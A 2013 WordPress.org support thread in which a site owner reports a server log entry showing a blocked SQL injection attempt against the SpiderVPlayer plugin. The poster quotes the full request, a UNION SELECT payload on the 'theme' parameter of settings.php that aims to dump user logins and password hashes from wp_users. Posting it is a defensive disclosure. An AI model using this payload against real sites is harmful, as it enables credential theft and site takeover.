Title: GET request vulnerability?
Last modified: August 21, 2016

---

# GET request vulnerability?

 *  [carbeck](https://wordpress.org/support/users/carbeck/)
 * (@carbeck)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/get-request-vulnerability/)
 * Hi there,
 * I don’t use this plugin for my own site, but I found this line in my server log
   today:
 * > 27.155.*.* – – [26/Apr/2013:21:36:44 +0000] “GET /wp-content/plugins/player/
   > settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,
   > 0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
   > +from+wp_users– HTTP/1.0” 403 1090 “-” “-“
 * Clearly, someone tried to exploit WordPress using this plugin so that a list 
   of users and passwords would get returned. I don’t know if this vulnerability
   has been fixed already, I just wanted to make sure it doesn’t go unnoticed in
   any case.
 * The request was blocked by Bad Behavior for “URL pattern found on blacklist”;
   the assault came from China.
 * [http://wordpress.org/extend/plugins/player/](http://wordpress.org/extend/plugins/player/)

The topic ‘GET request vulnerability?’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/player.svg)
 * [SpiderVPlayer](https://wordpress.org/plugins/player/)
 * [Support Threads](https://wordpress.org/support/plugin/player/)
 * [Active Topics](https://wordpress.org/support/plugin/player/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/player/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/player/reviews/)

 * 0 replies
 * 1 participant
 * Last reply from: [carbeck](https://wordpress.org/support/users/carbeck/)
 * Last activity: [13 years, 1 month ago](https://wordpress.org/support/topic/get-request-vulnerability/)
 * Status: not resolved